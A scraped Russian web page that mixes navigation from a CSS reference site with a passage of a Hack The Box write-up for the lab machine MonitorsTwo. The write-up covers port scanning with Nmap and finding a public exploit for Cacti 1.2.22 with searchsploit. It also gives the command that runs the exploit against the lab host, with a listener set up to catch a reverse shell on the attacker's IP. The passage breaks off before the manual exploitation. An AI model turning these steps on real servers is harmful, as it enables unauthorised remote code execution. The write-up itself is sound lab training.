Невозможно отучить людей изучать самые ненужные предметы.
Введение в CSS
Преимущества стилей
Добавления стилей
Типы носителей
Базовый синтаксис
Значения стилевых свойств
Селекторы тегов
Классы
CSS3
Надо знать обо всем понемножку, но все о немногом.
Идентификаторы
Контекстные селекторы
Соседние селекторы
Дочерние селекторы
Селекторы атрибутов
Универсальный селектор
Псевдоклассы
Псевдоэлементы
Кто умеет, тот делает. Кто не умеет, тот учит. Кто не умеет учить - становится деканом. (Т. Мартин)
Группирование
Наследование
Каскадирование
Валидация
Идентификаторы и классы
Написание эффективного кода
Вёрстка
Изображения
Текст
Цвет
Линии и рамки
Углы
Списки
Ссылки
Дизайны сайтов
Формы
Таблицы
CSS3
HTML5
Блог для вебмастеров
Новости мира Интернет
Сайтостроение
Ремонт и советы
Все новости
Справочник от А до Я
HTML, CSS, JavaScript
Афоризмы о учёбе
Статьи об афоризмах
Все Афоризмы
Помогли мы вам |
Hack The Box. Уровень ее сложности — легкий.
Подключаться к машинам с HTB рекомендуется только через VPN. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.
Добавляем IP-адрес машины в /
:
10.10.11.211 monitorstwo.htb
И запускаем сканирование портов.
Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.
Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
ports=$(nmap -p- --min-rate=500 $1 | grep^[0-9] | cut -d '/' -f 1 | tr 'n' ',' | sed s/,$//)nmap -p$ports -A $1
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция -A
).
Результат работы скрипта
Сканер находит нам два открытых порта: 22 — служба OpenSSH 8.2p1 и 80 — веб‑сервер Nginx 1.18.0.
Сразу переходим к сайту и видим там форму авторизации.
Страница авторизации сайта
Ниже указана версия CMS Cacti — 1.2.22.
Первым делом стоит проверить, есть ли для обнаруженного движка уже готовые эксплоиты. Если ты, как и я, используешь Kali Linux, то база эксплоитов ExploitDB у тебя уже есть под рукой. Достаточно вызвать утилиту SearchSploit и указать ключевое слово.
searchsploit Cacti
Эксплоиты, найденные при помощи SearchSploit
Видим, что есть эксплоит для подходящей версии Cacti. Он должен дать нам возможность удаленного выполнения кода (RCE). Посмотрим, какая есть дополнительная информация об эксплоите.
searchsploit -pphp/webapps/51166.py
Информация об эксплоите
Приступаем к эксплуатации. Сначала запустим листенер pwncat-cs для получения реверс‑шелла. А затем и сам эксплоит:
python3 51166.py -uhttp://10.10.11.211 -p10.10.14.111 -i4321
Но в ответ ничего не получаем. Видимо, у нас нет доступа к нужному эндпоинту API. Что ж, придется действовать вручную. Открываем код эксплоита и пробуем повторить шаги.
Исходный код эксплоита
|
|